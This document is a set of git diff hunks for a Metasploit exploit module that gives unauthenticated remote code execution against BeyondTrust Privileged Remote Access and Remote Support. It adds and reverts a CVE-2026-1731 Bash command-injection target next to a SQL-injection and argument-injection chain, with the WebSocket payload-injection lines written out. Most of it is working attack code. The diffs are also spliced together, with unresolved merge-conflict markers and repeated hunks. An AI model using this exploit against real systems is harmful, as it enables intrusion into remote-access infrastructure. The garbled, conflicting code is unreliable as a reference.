-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
 
     servers = Rex::Text.html_decode(::Regexp.last_match(1))
 
     servers_array = JSON.parse(servers)
 
-    return error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
 
-    return error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
 
     server = servers_array.first
 
@@ -343,11 +412,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     { company: company, server: server }
   rescue JSON::ParserError
-    error('get_site_info_via_download_client_connector JSON parse error.')
+    module_error('get_site_info_via_download_client_connector JSON parse error.')
   end
 
   # Helper method to print an error and then return nil.
-  def error(message)
+  def module_error(message)
     print_error(message)
     nil
   end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -144,7 +144,11 @@ class MetasploitModule < Msf::Exploit::Remote
     brdf_data = res.body[header[1].length..]
 
     # NOTE: Remote Support (RS) instances contain "Thank you for using BeyondTrust" in the BRDF data,
+<<<<<<< HEAD
     # but Privileged Remote Access (PRA) instances do not. So we can't use this check.
+=======
+    # but Privileged Remote Access (PRA) instances do not. We skip this check to support both products.
+>>>>>>> 71712883ce (Fix BeyondTrust exploit failing on older instances (22.x))
 
     # Pull out the magic value (4 bytes), the first tag and its value (file version, 3 bytes), and then the second tag
     # and its value (product version). The product version is encoded as a string, so has two tags, one for the
@@ -351,10 +355,10 @@ class MetasploitModule < Msf::Exploit::Remote
     error('get_site_info_via_mech_list company not found.')
   end
 
-
   def parse_mech_list_json(res)
     res.get_json_document['company']
   end
+
 
   # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
   def parse_mech_list_text(res)

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -17,27 +17,61 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution',
         'Description' => %q{
           This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
-          Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
-          product site. This exploit targets PRA and RS versions 24.3.1 and below.
+          Access (PRA) and Remote Support (RS). It leverages three different vulnerabilities depending on the
+          user-selected target.
+
+          The default target leverages CVE-2026-1731, a direct command injection affecting RS versions 25.3.1
+          and prior, and PRA versions 24.3.4 and prior.
+
+          Alternatively, the module can leverage a chain of CVE-2025-1094 (SQL injection in PostgreSQL)
+          and CVE-2024-12356 (argument injection), affecting RS and PRA versions 24.3.1 and prior.
+
+          Exploitation occurs with the privileges of the site user of the targeted BeyondTrust product site.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7' # Rapid7 Analysis and Metasploit module
+          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
+          'Harsh Jaiswal', # Discovery of CVE-2026-1731
+          'Jonah Burgess (CryptoCat)' # Added support for CVE-2026-1731
         ],
         'References' => [
-          ['CVE', '2024-12356'], # The argument injection in BeyondTrust code. By default, this exploit does not leverage CVE-2024-12356.
-          ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
-          ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
-          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
+          ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
+          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
+          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
+          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
+          ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
         ],
-        'DisclosureDate' => '2024-12-16',
+        'DisclosureDate' => '2026-02-06',
         'Platform' => [ 'linux', 'unix' ],
         'Arch' => [ARCH_CMD],
         'Privileged' => false, # Executes as the site user.
         'Targets' => [
           [
-            'Default', {
+            'CVE-2026-1731 (Command Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
+                # We must avoid characters that break the subshell or the arithmetic structure.
+                'BadChars' => '[$()]'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQL Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
+                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
+                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
+                'BadChars' => '\'"\\'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
               'Payload' => {
                 'DisableNops' => true,
                 # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
@@ -74,8 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options(
       [
         OptString.new('TargetCompanyName', [false, 'If set, use this name value to identify the company name of the deployed site. By default, this is auto discovered.']),
-        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.']),
-        OptBool.new('LeverageCVE_2024_12356', [false, 'By default, this exploit does not leverage CVE-2024-12356. Enabling this option will cause this exploit to leverage CVE-2024-12356.', false])
+        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.'])
       ]
     )
   end
@@ -127,17 +160,31 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
 
     product_version = brdf_data[10, file_version_data_len - 1]
+    version = Rex::Version.new(product_version)
 
     # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
     # However, they both share a common version number, and a common patch for this vulnerability.
     #
-    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected, so we do not have a lower
-    # bound version number to test against.
+    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected for the older CVEs,
+    # and versions 25.3.1 (RS) / 24.3.4 (PRA) for CVE-2026-1731. We do not have a lower bound version number to test against.
     #
-    # Note #2: The vendor supplied a patch (BT24-10-ONPREM1 or BT24-10-ONPREM2) to remediate the issue, in lieu of an
+    # Note #2: The vendor supplied patches (BT24-10-ONPREM or BT26-02-ONPREM) to remediate the issues, in lieu of an
     # updated product release. This patch does not change the products version number, so we cannot tell via a version
     # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
-    if Rex::Version.new(product_version) <= Rex::Version.new('24.3.1')
+
+    if target.name.include? 'CVE-2026-1731'
+      # RS branch (25.x) vs PRA branch (24.x)
+      is_vulnerable = if version >= Rex::Version.new('25.0.0')
+                        version <= Rex::Version.new('25.3.1')
+                      else
+                        version <= Rex::Version.new('24.3.4')
+                      end
+    else
+      # Older CVEs (24.3.1 and below)
+      is_vulnerable = version <= Rex::Version.new('24.3.1')
+    end
+
+    if is_vulnerable
       return CheckCode::Appears("Detected version #{product_version}")
     end
 
@@ -181,44 +228,64 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers
     )
 
-    # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
-    # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
-    # version 2.
-    wsock.put_wstext("1\n")
+    if target.name.include? 'CVE-2026-1731'
+      vprint_status('Leveraging CVE-2026-1731 (Bash Arithmetic Evaluation Injection)...')
+      # The CVE-2026-1731 vulnerability is triggered during the arithmetic evaluation of the remoteVersion variable.
+      # We use a malicious string that triggers a subshell execution via Bash array index notation.
 
-    # Transmit a random UUID value for the 'thin mint' cookie value.
-    wsock.put_wstext("#{SecureRandom.uuid}\n")
+      # Use a random prefix for the arithmetic evaluation variable
+      prefix = Rex::Text.rand_text_alpha(rand(1..5))
+      # We use a random trailing number to maintain the arithmetic structure
+      suffix = rand(0..9)
 
-    # Transmit the auth type we want. Zero is the gskey auth type.
-    wsock.put_wstext("0\n")
+      # The remoteVersion injection point
+      wsock.put_wstext("#{prefix}[$(#{payload.encoded})]#{suffix}\n")
 
-    # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
-    # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
-    # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
-
-    if datastore['LeverageCVE_2024_12356']
-      vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
-
-      # Transmit the malicious gskey value and exploit the argument injection vulnerability.
-      # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
-      # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
-      # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
-      # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
-      # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
-      # a \! meta-command, we can execute and arbitrary shell command.
-      wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
+      # Complete the sequence with randomized dummy data to avoid static artifacts
+      wsock.put_wstext("#{SecureRandom.uuid}\n")     # remoteCookie
+      wsock.put_wstext("#{rand(0..2)}\n")            # remoteAuthType (usually 0, 1, or 2)
+      wsock.put_wstext("#{Rex::Text.rand_text_alpha(rand(4..8))}\n") # remoteGsKey
     else
-      vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
+      # CVE-2025-1094 / CVE-2024-12356
+      # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
+      # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
+      # version 2.
+      wsock.put_wstext("1\n")
 
-      # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
-      # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
-      wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
+      # Transmit a random UUID value for the 'thin mint' cookie value.
+      wsock.put_wstext("#{SecureRandom.uuid}\n")
+
+      # Transmit the auth type we want. Zero is the gskey auth type.
+      wsock.put_wstext("0\n")
+
+      # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
+      # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
+      # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
+
+      if target.name.include? 'CVE-2024-12356'
+        vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
+
+        # Transmit the malicious gskey value and exploit the argument injection vulnerability.
+        # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
+        # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
+        # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
+        # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
+        # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
+        # a \! meta-command, we can execute and arbitrary shell command.
+        wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
+      else
+        vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
+
+        # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
+        # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
+        wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
+      end
     end
 
-    # The vendor patch BT24-10-ONPREM1 will detect a malformed gskey value, and terminate the thin-scc-wrapper script
-    # early, tearing down the WebSocket connection. We can detect this here and warn the user that the target may
-    # actually be patched. As the patch does not change the servers version number, we cannot detect the patch via a
-    # version based check.
+    # The vendor patch BT24-10-ONPREM1 (and subsequent patches) will detect a malformed gskey value, and terminate the
+    # thin-scc-wrapper script early, tearing down the WebSocket connection. We can detect this here and warn the user
+    # that the target may actually be patched. As the patch does not change the servers version number, we cannot
+    # detect the patch via a version based check.
     while wsock.has_read_data? datastore['WFSDELAY']
       frame = wsock.get_wsframe
 
@@ -290,6 +357,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res.get_json_document['company']
   end
 
+
   # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
   def parse_mech_list_text(res)
     res.body.split(';').each do |part|
@@ -308,34 +376,34 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    return error('get_site_info Connection 1 failed.') unless res1
+    return module_error('get_site_info Connection 1 failed.') unless res1
 
-    return error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
+    return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
 
-    return error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
+    return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
 
     res2 = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
     )
 
-    return error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
+    return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
 
-    return error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
+    return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
 
-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
 
     company = Rex::Text.html_decode(::Regexp.last_match(1))
 
-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
 
     servers = Rex::Text.html_decode(::Regexp.last_match(1))
 
     servers_array = JSON.parse(servers)
 
-    return error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
 
-    return error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
 
     server = servers_array.first
 
@@ -343,11 +411,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     { company: company, server: server }
   rescue JSON::ParserError
-    error('get_site_info_via_download_client_connector JSON parse error.')
+    module_error('get_site_info_via_download_client_connector JSON parse error.')
   end
 
   # Helper method to print an error and then return nil.
-  def error(message)
+  def module_error(message)
     print_error(message)
     nil
   end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::HTTP::Beyondtrust
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http::WebSocket
   prepend Msf::Exploit::Remote::AutoCheck
@@ -17,60 +18,27 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution',
         'Description' => %q{
           This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
-          Access (PRA) and Remote Support (RS). It leverages three different vulnerabilities depending on the
-          user-selected target.
-
-          The default target leverages CVE-2026-1731, a direct command injection affecting RS versions 25.3.1
-          and prior, and PRA versions 24.3.4 and prior.
-
-          Alternatively, the module can leverage a chain of CVE-2025-1094 (SQL injection in PostgreSQL)
-          and CVE-2024-12356 (argument injection), affecting RS and PRA versions 24.3.1 and prior.
-
-          Exploitation occurs with the privileges of the site user of the targeted BeyondTrust product site.
+          Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
+          product site. This exploit targets PRA and RS versions 24.3.1 and below.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
-          'Harsh Jaiswal', # Discovery of CVE-2026-1731
+          'sfewer-r7' # Rapid7 Analysis and Metasploit module
         ],
         'References' => [
-          ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
-          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
-          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
-          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
-          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
-          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
-          ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
+          ['CVE', '2024-12356'], # The argument injection in BeyondTrust code. By default, this exploit does not leverage CVE-2024-12356.
+          ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
+          ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
+          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
         ],
-        'DisclosureDate' => '2026-02-06',
+        'DisclosureDate' => '2024-12-16',
         'Platform' => [ 'linux', 'unix' ],
         'Arch' => [ARCH_CMD],
         'Privileged' => false, # Executes as the site user.
         'Targets' => [
           [
-            'CVE-2026-1731 (Command Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
-                # We must avoid characters that break the subshell or the arithmetic structure.
-                'BadChars' => '[$()]'
-              }
-            }
-          ],
-          [
-            'CVE-2025-1094 (SQL Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
-                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
-                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
-                'BadChars' => '\'"\\'
-              }
-            }
-          ],
-          [
-            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
+            'Default', {
               'Payload' => {
                 'DisableNops' => true,
                 # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
@@ -107,138 +75,18 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options(
       [
         OptString.new('TargetCompanyName', [false, 'If set, use this name value to identify the company name of the deployed site. By default, this is auto discovered.']),
-        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.'])
+        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.']),
+        OptBool.new('LeverageCVE_2024_12356', [false, 'By default, this exploit does not leverage CVE-2024-12356. Enabling this option will cause this exploit to leverage CVE-2024-12356.', false])
       ]
     )
   end
 
   def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'get_rdf'),
-      'vars_get' => {
-        'comp' => 'sdcust',
-        'locale_code' => 'en-us'
-      }
-    )
+    product_version = get_version
+    return CheckCode::Unknown unless product_version
 
-    return CheckCode::Unknown('Connection failed') unless res
-
-    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
-
-    # The HTTP content data will have something like this, followed by ~800Kb of string data:
-
-    # 00000000  30 20 53 75 63 63 65 73 73 66 75 6c 0a 65 6e 2d  |0 Successful.en-|
-    # 00000010  75 73 0a 31 37 33 37 33 36 38 38 37 32 0a 42 52  |us.1737368872.BR|
-    # 00000020  44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82  |DF......24.1.2..|
-    # 00000030  00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73  |....g.%(...en-us|
-
-    # First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.
-
-    header = res.body.match(/^(0 Successful\n.+\n\d+\n)/)
-
-    return CheckCode::Unknown('Unexpected response header') unless header
-
-    # Extract the remainder of the data, after the "0 Successful\nLOCALE_ID\nTIMESTAMP\n" pre-amble.
-    brdf_data = res.body[header[1].length..]
-
-    return CheckCode::Unknown('Unexpected response data') unless brdf_data.include? 'Thank you for using BeyondTrust'
-
-    # Pull out the magic value (4 bytes), the first tag and its value (file version, 3 bytes), and then the second tag
-    # and its value (product version). The product version is encoded as a string, so has two tags, one for the
-    # string type (0x91) and the other for the tag type (0x81).
-    magic, _, _, prod_version_tag1, file_version_data_len, file_version_tag2 = brdf_data.unpack('NCvCCC')
-
-    # Inspect the data to ensure it looks like what we expect.
-
-    return CheckCode::Unknown('Unexpected header magic') unless magic == 0x42524446 # BRDF
-
-    return CheckCode::Unknown('Unexpected header prod_version_tag1') unless prod_version_tag1 == 0x91 # RDF_SMALL_SIZE
-
-    return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
-
-    product_version = brdf_data[10, file_version_data_len - 1]
-
-    # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
-    # However, they both share a common version number, and a common patch for this vulnerability.
-    #
-    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected, so we do not have a lower
-    # bound version number to test against.
-    #
-    # Note #2: The vendor supplied a patch (BT24-10-ONPREM1 or BT24-10-ONPREM2) to remediate the issue, in lieu of an
-    # updated product release. This patch does not change the products version number, so we cannot tell via a version
-    # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
+    product_version = Rex::Version.new(product_version)
     if Rex::Version.new(product_version) <= Rex::Version.new('24.3.1')
-
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'get_rdf'),
-      'vars_get' => {
-        'comp' => 'sdcust',
-        'locale_code' => 'en-us'
-      }
-    )
-
-    return CheckCode::Unknown('Connection failed') unless res
-
-    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
-
-    # The HTTP content data will have something like this, followed by ~800Kb of string data:
-
-    # 00000000  30 20 53 75 63 63 65 73 73 66 75 6c 0a 65 6e 2d  |0 Successful.en-|
-    # 00000010  75 73 0a 31 37 33 37 33 36 38 38 37 32 0a 42 52  |us.1737368872.BR|
-    # 00000020  44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82  |DF......24.1.2..|
-    # 00000030  00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73  |....g.%(...en-us|
-
-    # First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.
-
-    header = res.body.match(/^(0 Successful\n.+\n\d+\n)/)
-
-    return CheckCode::Unknown('Unexpected response header') unless header
-
-    # Extract the remainder of the data, after the "0 Successful\nLOCALE_ID\nTIMESTAMP\n" pre-amble.
-    brdf_data = res.body[header[1].length..]
-
-    # NOTE: Remote Support (RS) instances contain "Thank you for using BeyondTrust" in the BRDF data,
-    # but Privileged Remote Access (PRA) instances do not. So we can't use this check.
-
-    # Pull out the magic value (4 bytes), the first tag and its value (file version, 3 bytes), and then the second tag
-    # and its value (product version). The product version is encoded as a string, so has two tags, one for the
-    # string type (0x91) and the other for the tag type (0x81).
-    magic, _, _, prod_version_tag1, file_version_data_len, file_version_tag2 = brdf_data.unpack('NCvCCC')
-
-    # Inspect the data to ensure it looks like what we expect.
-
-    return CheckCode::Unknown('Unexpected header magic') unless magic == 0x42524446 # BRDF
-
-    return CheckCode::Unknown('Unexpected header prod_version_tag1') unless prod_version_tag1 == 0x91 # RDF_SMALL_SIZE
-
-    return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
-
-    product_version = brdf_data[10, file_version_data_len - 1]
-    version = Rex::Version.new(product_version)
-
-    # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
-    # However, they both share a common version number, and a common patch for this vulnerability.
-    #
-    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected for the older CVEs,
-    # and versions 25.3.1 (RS) / 24.3.4 (PRA) for CVE-2026-1731. We do not have a lower bound version number to test against.
-    #
-    # Note #2: The vendor supplied patches (BT24-10-ONPREM or BT26-02-ONPREM) to remediate the issues, in lieu of an
-    # updated product release. This patch does not change the products version number, so we cannot tell via a version
-    # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
-
-    if target.name.include? 'CVE-2026-1731'
-      # CVE-2026-1731: Vulnerable if RS (<= 25.3.1) OR PRA (<= 24.3.4)
-      # Since we can't distinguish, we flag if it matches the higher RS range.
-      is_vulnerable = version <= Rex::Version.new('25.3.1')
-    else
-      # Older CVEs: Both products were affected <= 24.3.1
-
-      is_vulnerable = version <= Rex::Version.new('24.3.1')
-    end
-
-    if is_vulnerable
       return CheckCode::Appears("Detected version #{product_version}")
     end
 
@@ -282,71 +130,51 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers
     )
 
-    if target.name.include? 'CVE-2026-1731'
-      vprint_status('Leveraging CVE-2026-1731 (Bash Arithmetic Evaluation Injection)...')
-      # The CVE-2026-1731 vulnerability is triggered during the arithmetic evaluation of the remoteVersion variable.
-      # We use a malicious string that triggers a subshell execution via Bash array index notation.
+    # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
+    # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
+    # version 2.
+    wsock.put_wstext("1\n")
 
-      # Use a random prefix for the arithmetic evaluation variable
-      prefix = Rex::Text.rand_text_alpha(rand(1..5))
-      # We use a random trailing number to maintain the arithmetic structure
-      suffix = rand(0..9)
+    # Transmit a random UUID value for the 'thin mint' cookie value.
+    wsock.put_wstext("#{SecureRandom.uuid}\n")
 
-      # The remoteVersion injection point
-      wsock.put_wstext("#{prefix}[$(#{payload.encoded})]#{suffix}\n")
+    # Transmit the auth type we want. Zero is the gskey auth type.
+    wsock.put_wstext("0\n")
 
-      # Complete the sequence with randomized dummy data to avoid static artifacts
-      wsock.put_wstext("#{SecureRandom.uuid}\n")     # remoteCookie
-      wsock.put_wstext("#{rand(0..2)}\n")            # remoteAuthType (usually 0, 1, or 2)
-      wsock.put_wstext("#{Rex::Text.rand_text_alpha(rand(4..8))}\n") # remoteGsKey
+    # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
+    # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
+    # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
+
+    if datastore['LeverageCVE_2024_12356']
+      vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
+
+      # Transmit the malicious gskey value and exploit the argument injection vulnerability.
+      # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
+      # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
+      # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
+      # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
+      # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
+      # a \! meta-command, we can execute and arbitrary shell command.
+      wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
     else
-      # CVE-2025-1094 / CVE-2024-12356
-      # Transmit a version for the request. The target may use version 2, but will agree to a lower version. By using a
-      # lower version of 1, we expect to be able to exploit older versions of the affected products which do not support
-      # version 2.
-      wsock.put_wstext("1\n")
